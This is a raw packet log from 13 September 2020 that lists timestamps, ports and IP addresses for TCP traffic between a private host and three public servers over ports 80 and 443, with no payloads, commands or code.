Sep 13, 2020 20:54:45.604058981 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.604134083 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.666397095 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666470051 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666513920 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666528940 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.666549921 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666565895 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666600943 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666697979 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.666702986 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666747093 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666764021 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.666830063 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.667525053 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667566061 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667593956 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667604923 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.667610884 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667624950 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667639971 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667749882 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.667818069 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667835951 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667853117 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667869091 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667886019 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667937994 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.667963028 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.667973042 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.668061018 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.668123007 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.668191910 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.668287992 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.668319941 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.668390989 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.730983019 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731025934 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731046915 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731064081 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731128931 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731168985 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731185913 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.731188059 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731226921 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731246948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731266022 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731281042 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731297016 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731384039 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.731635094 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731739998 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.731821060 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731838942 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.731857061 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.731967926 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.731988907 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732028008 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732053995 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732069016 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732105970 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.732146025 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732172966 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732281923 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.732346058 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732414961 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732440948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732459068 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732472897 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.732506990 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732533932 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732553959 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732569933 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.732654095 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:47.786706924 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:47.786914110 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:47.851134062 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:47.860716105 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:47.902555943 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:49.002177000 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.040574074 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.040710926 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.095318079 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.133090019 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.134386063 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.134413958 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.134423971 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.134597063 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.144100904 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.182584047 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.277426004 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.289251089 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:49.363648891 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.365782022 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.365807056 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.365818977 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.365829945 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:49.365891933 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:54.381633043 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:54.419398069 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:54.459295034 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:54.459317923 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:54.459414959 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:54.459419012 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:54.459427118 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:54.459562063 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:59.476295948 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:54:59.514369011 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:59.559254885 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:59.559266090 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:59.559281111 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:59.559320927 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:54:59.559407949 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:55:04.582684040 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:55:04.620304108 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658365011 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658385992 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658392906 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658400059 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658406019 CEST	443	49720	195.201.225.248	192.168.2.3
Sep 13, 2020 20:55:04.658526897 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:55:05.243383884 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.264548063 CEST	80	49721	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:05.264693022 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.265815973 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.266124964 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.287026882 CEST	80	49721	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:05.287220001 CEST	80	49721	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:05.411256075 CEST	80	49721	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:05.411364079 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.412005901 CEST	49721	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:05.433629036 CEST	80	49721	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.629537106 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.652930975 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.653037071 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.672116041 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.730787992 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730808973 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730818987 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730829954 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730879068 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730897903 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730906010 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730915070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.730951071 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.730982065 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.731074095 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.731152058 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.731235027 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.754230022 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754283905 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754298925 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754318953 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754339933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754348993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754398108 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754409075 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754415035 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754421949 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754446030 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.754479885 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754487991 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754494905 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754501104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754508018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754528999 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754537106 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754543066 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754615068 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.754682064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754693031 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.754735947 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.778078079 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778099060 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778135061 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778168917 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778183937 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778197050 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778208017 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.778209925 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778233051 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778245926 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778291941 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778318882 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778384924 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.778393984 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778404951 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778412104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778419018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778425932 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778431892 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778439999 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778445005 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778451920 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778466940 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778474092 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778480053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778486967 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778492928 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778498888 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778506041 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778512001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778531075 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778573036 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778598070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778635979 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778639078 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.778675079 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778685093 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778696060 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778704882 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778825998 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778850079 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778853893 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.778867006 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.778883934 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.779004097 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.801820993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801856041 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801867008 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801878929 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801888943 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801898956 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.801990032 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802021027 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802133083 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802146912 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802191973 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802232027 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802242041 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802251101 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802269936 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802289009 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802320004 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802366018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802387953 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802398920 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802402973 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802408934 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802417994 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802427053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802438021 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802448034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802542925 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802602053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802618980 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802628994 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802642107 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802659988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802670956 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802683115 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802704096 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802727938 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802750111 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802767992 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802788973 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802794933 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802813053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802825928 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802844048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802860022 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802880049 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802931070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.802962065 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.802966118 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803013086 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803034067 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803055048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803066969 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.803081989 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803107023 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803132057 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803157091 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803164005 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.803185940 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803205013 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803220034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803253889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803283930 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.803287983 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803298950 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803308964 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803328037 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803338051 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803350925 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803366899 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803376913 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803388119 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803397894 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803410053 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803411007 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.803435087 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803451061 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803461075 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803471088 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803481102 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803494930 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803507090 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803517103 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803520918 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.803527117 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803536892 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803545952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803555965 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803565979 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803575993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803586006 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803596020 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803606033 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803616047 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.803680897 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.825448036 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825469971 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825488091 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825499058 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825508118 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825517893 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825526953 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825572014 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.825661898 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.825825930 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825858116 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825881958 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825885057 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.825937033 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825948000 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825973034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.825997114 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826014042 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826040983 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.826045990 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826070070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.826106071 CEST	80	49722	47.245.136.23	192.168.2.3
